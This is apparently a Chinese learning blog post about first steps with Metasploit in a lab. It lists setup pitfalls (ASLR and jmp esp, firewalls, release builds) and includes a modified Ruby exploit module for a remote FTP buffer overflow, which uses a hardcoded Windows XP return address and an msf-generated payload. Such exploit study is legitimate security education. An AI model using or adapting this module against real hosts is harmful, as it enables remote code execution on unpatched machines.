0day 安全之 msf 初探

msf 这个工具 在我还没有开始学pwn 就有搞web的人 说过这个框架

只是没有怎么了解

没有想到这个工具 竟然使用Ruby 写的,, 社会 社会,。

然后这里 关于在 windows下的安装 我就不说了 反正 都一样(直接用kail的就行)

不过  有一点 感觉很坑  就是 版本不一样 然后  导致我们写的 exploit 可能会加载失败,,(可能是)

这里我也不太确定,因为我也不太熟悉rust开发 更不熟悉msf的框架

但是 我历经了大半天 还是把这个环境给搞定了, 效果截图

可以看到 我用的是 windows 7 x86

其实我已经装上了 XP 还有windows 2000  为啥要用 win7

这里就是我要说的第一个坑点了

 一定要用程序来找一下 jmp esp      这里win7 因为开了 加载基址随机化 所以每次开机都要重新 查找一次

但是 xp 和 2000 不用  

第二个坑点就是   一定要把 攻击机的防火墙给关了  

第三个坑点就是 编译的程序尽量用 release 版本的 不要用 debug版本的

然后 这里贴上 我改过的模块

require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
  include Msf::Exploit::Remote::Ftp
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'security test',
      'Description'    => %q{
          This module exploits a buffer overflow.
      },
      'Author'         => 'fwd',
      'License'        => MSF_LICENSE,
      'Privileged'     => true,
      'Payload'        =>
        {
          'Space'    => 300,
          'BadChars' => "\x00",
        },
      'Platform' 		  => 'win',
      'Targets'        =>
        [
          [ 'Windows XP Pro SP2 English',           { 'Ret' => 0x770445ee } ],
        ]))
  end
 
  def exploit
    connect
    attack_buf =  'a'*200
    attack_buf += [target.ret].pack('V')
    attack_buf += payload.encoded
    sock.put(attack_buf)
    handler
    disconnect
  end
end

然后就是我的攻击机的 环境

windows 10  然后 msf版本 是

 然后这里可以看出 我已经利用成功了

那么我这里就看一下利用方法,。

其实利用方法没有什么好说的 其实和上一篇的那个本地的 只不过这里 是用的socket网络链接

然后可以让我们 感受到实战的感觉

payload 用的是 msf自己生成的   然后我们只需要  找到方法自己生成 paload 就可以了

下面 开始windows2000的 堆^=^

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值